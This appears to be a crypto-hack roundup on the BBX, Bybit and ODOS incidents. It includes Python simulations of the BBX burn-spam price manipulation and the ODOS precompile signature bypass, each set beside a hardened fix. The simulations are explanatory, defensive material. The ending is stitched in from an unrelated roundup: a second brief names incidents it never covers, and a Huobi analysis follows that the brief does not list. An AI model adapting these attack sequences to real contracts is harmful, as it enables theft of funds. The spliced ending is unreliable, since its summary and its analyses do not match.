ByBit, ODOS, and BBX Hacked: $1.5B Drained via Social Engineering, Signature Bypass, and Burn Exploit
ByBit lost $1.5B after signers unknowingly approved a contract upgrade with hidden backdoors. ODOS Protocol suffered a $50K hit from a signature-validation flaw that a precompiled contract could satisfy. BBX's flawed burn mechanism let an attacker spam zero-amount transfers, draining $12K through price manipulation.
In Brief
BBX lost $12K due to a burn mechanism flaw.
ByBit suffered a $1.5B loss due to a social engineering attack.
ODOS Protocol lost $50K due to an input validation vulnerability.
Hacks Analysis
BBX | Amount Lost: $12K
On March 20, 2025, the BBX token on BNB Smart Chain (BSC) was exploited for about $12,000 through a flaw in its _transfer() function. The attacker repeatedly called transfer with amount = 0; each call still reached the burn branch, which moved tokens from the liquidity pool to the 0xdead address and then called sync() on the pair, so every burn shrank the pool's token reserve and pushed the spot price up. The guard if (block.timestamp >= lastBurnTime + lastBurnGapTime) did not limit this: block.timestamp is identical for every call in a block, so the check could not rate-limit burns triggered within the same block. Having bought tokens beforehand, the attacker sold into the inflated price. The hardening a reviewer would ask for: reject zero-amount transfers before any side effect, never let an arbitrary caller burn from the pool's balance on demand, and advance lastBurnTime (or record the block number) when a burn executes so the branch runs at most once per interval.
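The mechanics above are easier to see in numbers. The following simulation is an added example, not the BBX contract's code: it models a burn-on-transfer token whose burn hook takes tokens out of a constant-product pair and calls sync(), then runs the buy / spam-the-hook / sell sequence against a vulnerable and a hardened variant. Everything about the pool is assumed rather than taken from the page (no swap fee, a 1% burn of the pool balance per trigger, swaps that move balances without re-entering the burn hook), and because the page does not show how lastBurnTime was updated, the vulnerable variant assumes it is never advanced, so the quoted timestamp check passes on every call in the block.

```python
# Added simulation, not the BBX contract: a burn-on-transfer token whose burn hook takes
# tokens out of an AMM pair and calls sync(). Assumptions (none from the page): a fee-less
# constant-product pool, a 1% burn of the pool balance per trigger, swaps that move balances
# without re-entering the burn hook, and a vulnerable variant that never advances
# lastBurnTime, so the quoted timestamp check passes on every call within the block.

DEAD = "0x000000000000000000000000000000000000dEaD"


class BurnToken:
    def __init__(self, burn_bps: int, burn_gap: int):
        self.balances: dict = {}
        self.pool = None              # set by Pool.__init__
        self.burn_bps = burn_bps      # basis points of the pool balance burned per trigger
        self.burn_gap = burn_gap      # seconds the contract intends between burns
        self.last_burn_time = 0
        self.last_burn_block = -1
        self.burn_events = 0

    def balance_of(self, who) -> int:
        return self.balances.get(who, 0)

    def _move(self, src, dst, amount: int) -> None:
        if self.balance_of(src) < amount:
            raise ValueError("insufficient balance")
        self.balances[src] = self.balance_of(src) - amount
        self.balances[dst] = self.balance_of(dst) + amount

    def _burn_from_pool(self) -> None:
        burn = self.balance_of(self.pool) * self.burn_bps // 10_000
        self._move(self.pool, DEAD, burn)
        self.pool.sync()              # reserves now reflect the smaller balance: price rises
        self.burn_events += 1

    def transfer_vulnerable(self, sender, recipient, amount, block_timestamp, block_number):
        self._move(sender, recipient, amount)      # amount == 0 is accepted
        if block_timestamp >= self.last_burn_time + self.burn_gap:
            self._burn_from_pool()
            # ASSUMPTION: lastBurnTime is not advanced, so the same block_timestamp
            # satisfies the check again on the next call in this block.

    def transfer_hardened(self, sender, recipient, amount, block_timestamp, block_number):
        if amount == 0:
            raise ValueError("zero-amount transfer rejected")
        self._move(sender, recipient, amount)
        if (block_timestamp >= self.last_burn_time + self.burn_gap
                and block_number != self.last_burn_block):
            self.last_burn_time = block_timestamp   # one burn per gap ...
            self.last_burn_block = block_number     # ... and never twice in one block
            self._burn_from_pool()


class Pool:
    """Fee-less constant-product pair of `token` against a quote asset such as WBNB."""

    def __init__(self, token: BurnToken, reserve_token: int, reserve_quote: int):
        self.token = token
        token.pool = self
        token.balances[self] = reserve_token
        self.reserve_token = reserve_token
        self.reserve_quote = reserve_quote

    def spot_price(self) -> float:
        return self.reserve_quote / self.reserve_token

    def sync(self) -> None:           # Uniswap-style sync(): reserves := balances
        self.reserve_token = self.token.balance_of(self)

    def buy(self, buyer, quote_in: int) -> int:
        k = self.reserve_token * self.reserve_quote
        new_reserve_token = -(-k // (self.reserve_quote + quote_in))   # ceil division
        token_out = self.reserve_token - new_reserve_token
        self.reserve_quote += quote_in
        self.token._move(self, buyer, token_out)
        self.sync()
        return token_out

    def sell(self, seller, token_in: int) -> int:
        k = self.reserve_token * self.reserve_quote
        self.token._move(seller, self, token_in)
        self.sync()
        new_reserve_quote = -(-k // self.reserve_token)
        quote_out = self.reserve_quote - new_reserve_quote
        self.reserve_quote = new_reserve_quote
        return quote_out


def run_attack(variant: str, triggers: int = 50, quote_in: int = 10 * 10**18) -> dict:
    """Buy, hit the burn hook `triggers` times with amount 0 and `triggers` times with
    1 wei (all in one block), then sell everything back into the pool."""
    token = BurnToken(burn_bps=100, burn_gap=3600)
    pool = Pool(token, reserve_token=1_000_000 * 10**18, reserve_quote=100 * 10**18)
    attacker, ts, blk = "attacker", 1_700_000_000, 100
    transfer = getattr(token, variant)
    price_before = pool.spot_price()
    pool.buy(attacker, quote_in)
    rejected = 0
    for amount in [0] * triggers + [1] * triggers:
        try:
            transfer(attacker, attacker, amount, ts, blk)   # self-transfer, nothing really moves
        except ValueError:
            rejected += 1
    price_peak = pool.spot_price()
    quote_out = pool.sell(attacker, token.balance_of(attacker))
    return {"price_before": price_before, "price_peak": price_peak,
            "burns": token.burn_events, "rejected": rejected,
            "profit": quote_out - quote_in}


if __name__ == "__main__":
    for variant in ("transfer_vulnerable", "transfer_hardened"):
        print(variant, run_attack(variant))
```

Against the vulnerable variant all 100 self-transfers burn from the pool, the spot price more than doubles and the attacker sells back for more quote than they put in. The hardened variant rejects the 50 zero-amount calls outright and lets the 50 one-wei calls burn exactly once, which is the rate limit the original guard was meant to enforce; note that even a single burn from the pool still transfers a little value to whoever holds tokens at that moment, so the interval, not the check alone, is what bounds the damage.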
Exploited Contract (on BSC): 0x67ca347e7b9387af4e81c36cca4eaf080dcb33e9
Bybit | Amount Lost: $1.5B
On February 21, 2025, Bybit lost about $1.5B on the Ethereum Mainnet in a social engineering attack. Malicious JavaScript injected into the signing UI showed the signers a routine transfer, while the payload they actually approved carried a contract upgrade; the new implementation added backdoor functions that let the attacker drain roughly 401K ETH, which was then spread across 39 addresses. The defence this points at is procedural: the signed payload (target address, calldata, and whether it is a plain call or a delegatecall) has to be decoded and checked on a device the web UI cannot influence, and compared with what the UI claims the transaction does.
One of the exploiter contracts: 0x4571bd67d14280e40bf3910bd39fbf60834f900a
ODOS Protocol | Amount Lost: $50K
On January 23, 2025, the ODOS Protocol exploit on Base caused a $50K loss. The root cause was insufficient input validation in the OdosLimitOrderRouter's isValidSigImpl() function: when the _signer had no code, the router treated it as a not-yet-deployed smart-contract wallet, executed the caller-supplied factoryCalldata against the caller-supplied create2Factory, and only then called IERC1271Wallet.isValidSignature() on the signer. The attacker passed the identity precompile at address 0x4 as _signer. Precompiles have a code length of zero, and 0x4 returns its input unchanged, so the returned data began with the isValidSignature selector, which is exactly the ERC-1271 magic value the router compared against; the signature check passed without any signature being verified. The unverified factoryCalldata was an ERC20.transfer that the router executed from its own address, sending its tokens to the attacker. Two lessons apply to any validator built this way: zero code length does not mean "undeployed wallet" (precompiles and EOAs have none either), and a contract that holds funds must never make an arbitrary call chosen by the order it is validating.
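To make the bypass concrete, here is an added model (not the Odos router's code) of the check described above running inside a toy EVM: the identity precompile echoes the isValidSignature calldata back, so its first four bytes match the ERC-1271 magic value, while the "factory" call made first is really an ERC20 transfer from the router's balance. The addresses, balances, order hash and wallet signature are constructed for the example; the hardened variant is one reasonable fix, not the vendor's actual patch. The selectors 0x1626ba7e and 0xa9059cbb are the real standard values.

```python
# Added model, not the Odos router's code: why an ERC-1271 validator that treats
# "no code at the signer" as "wallet not deployed yet" can be satisfied by the identity
# precompile (0x04). Addresses, balances and signatures below are constructed; the
# hardened variant is one reasonable fix, not the vendor's actual patch.

ERC1271_MAGIC = bytes.fromhex("1626ba7e")      # selector of isValidSignature(bytes32,bytes)
TRANSFER_SELECTOR = bytes.fromhex("a9059cbb")  # selector of transfer(address,uint256)
IDENTITY_PRECOMPILE = 0x04
TRUSTED_FACTORIES = frozenset({0x6492})        # constructed allowlist for the hardened check


def word(n: int) -> bytes:
    return n.to_bytes(32, "big")


def encode_is_valid_signature(order_hash: bytes, sig: bytes) -> bytes:
    """ABI-encode isValidSignature(bytes32,bytes): selector, hash, offset, length, data."""
    return ERC1271_MAGIC + order_hash + word(0x40) + word(len(sig)) + sig + b"\x00" * (-len(sig) % 32)


class ToyEVM:
    def __init__(self):
        self.code = {}       # address -> bytecode
        self.handlers = {}   # address -> callable(caller, calldata) -> returndata
        self.balances = {}   # (token, holder) -> amount

    def extcodesize(self, addr: int) -> int:
        return len(self.code.get(addr, b""))    # precompiles and EOAs: 0

    def call(self, caller: int, target: int, calldata: bytes) -> bytes:
        if target == IDENTITY_PRECOMPILE:
            return calldata                     # 0x04 returns its input unchanged
        handler = self.handlers.get(target)
        return handler(caller, calldata) if handler else b""


def make_wallet(expected_sig: bytes):
    """Genuine ERC-1271 wallet: 32-byte ABI-encoded magic value, only for its own signature."""
    def handler(caller, calldata):
        sig_len = int.from_bytes(calldata[68:100], "big")
        ok = calldata[100:100 + sig_len] == expected_sig
        return (ERC1271_MAGIC if ok else b"\xff\xff\xff\xff") + b"\x00" * 28
    return handler


def make_token(evm: ToyEVM, token: int):
    def handler(caller, calldata):              # transfer(to, amount) spends the *caller's* balance
        if calldata[:4] != TRANSFER_SELECTOR:
            return b""
        to, amount = int.from_bytes(calldata[4:36], "big"), int.from_bytes(calldata[36:68], "big")
        if evm.balances.get((token, caller), 0) < amount:
            raise ValueError("insufficient balance")
        evm.balances[(token, caller)] -= amount
        evm.balances[(token, to)] = evm.balances.get((token, to), 0) + amount
        return word(1)
    return handler


def is_valid_sig_vulnerable(evm, router, signer, order_hash, sig, factory, factory_calldata) -> bool:
    if evm.extcodesize(signer) == 0:
        evm.call(router, factory, factory_calldata)   # unverified call made by the router itself
    ret = evm.call(router, signer, encode_is_valid_signature(order_hash, sig))
    return ret[:4] == ERC1271_MAGIC


def is_valid_sig_hardened(evm, router, signer, order_hash, sig, factory, factory_calldata) -> bool:
    if signer <= 0xFF:                                 # precompile range can never be a wallet
        return False
    if evm.extcodesize(signer) == 0:
        if factory not in TRUSTED_FACTORIES:           # never let the order choose the callee
            return False
        evm.call(router, factory, factory_calldata)
        if evm.extcodesize(signer) == 0:               # "deployment" must have produced code
            return False
    ret = evm.call(router, signer, encode_is_valid_signature(order_hash, sig))
    return len(ret) == 32 and ret[:4] == ERC1271_MAGIC and ret[4:] == b"\x00" * 28


def run_exploit(check) -> dict:
    evm = ToyEVM()
    ROUTER, TOKEN, ATTACKER, WALLET, FRESH = 0x1000, 0x2000, 0x3000, 0x4000, 0x5000
    evm.code[TOKEN] = evm.code[WALLET] = b"\x60\x80"   # placeholder bytecode, constructed
    evm.handlers[TOKEN] = make_token(evm, TOKEN)
    evm.handlers[WALLET] = make_wallet(b"wallet-signature")
    evm.balances[(TOKEN, ROUTER)] = 100_000            # tokens parked in the router
    steal = TRANSFER_SELECTOR + word(ATTACKER) + word(50_000)   # the "factoryCalldata"
    h = b"\x11" * 32                                   # constructed order hash
    return {
        # a never-deployed signer: the signature check fails, but the router call already ran
        "fresh_signer_passed": check(evm, ROUTER, FRESH, h, b"junk", TOKEN, steal),
        # the identity precompile: zero code, and it echoes the selector back as the "magic"
        "precompile_passed": check(evm, ROUTER, IDENTITY_PRECOMPILE, h, b"junk", TOKEN, steal),
        "legit_passed": check(evm, ROUTER, WALLET, h, b"wallet-signature", 0, b""),
        "stolen": evm.balances.get((TOKEN, ATTACKER), 0),
    }


if __name__ == "__main__":
    print("vulnerable:", run_exploit(is_valid_sig_vulnerable))
    print("hardened:  ", run_exploit(is_valid_sig_hardened))
```

The vulnerable run shows both halves of the bug: a fresh, code-less signer already costs the router 50,000 tokens even though its signature check fails, because the arbitrary factory call happens before any verification, and the precompile signer both drains another 50,000 and passes the check. The hardened variant refuses the precompile range, refuses unknown factories, insists that the factory call actually left code at the signer, and accepts only a well-formed 32-byte ERC-1271 reply, while the genuine wallet still validates.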
Exploited Contract (on Base): 0xb6333e994fd02a9255e794c177efbdeb1fe779c7
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
In Brief
Remitano suffered a $2.7M loss due to a private key compromise.
GAMBL’s recommendation system was exploited.
DAppSocial lost $530K due to a logic vulnerability.
Rocketswap’s private keys were inadvertently deployed on the server.
Hacks Analysis
Huobi | Amount Lost: $8M
On September 24th, the Huobi Global exploit on the Ethereum Mainnet resulted in an $8 million loss due to the compromise of private keys. The attacker carried out the attack in a single transaction, sending 4,999 ETH to a malicious contract, then created a second malicious contract and transferred 1,001 ETH to it. Huobi has since said that it has identified the attacker and has offered a 5% white-hat bounty if the funds are returned to the exchange.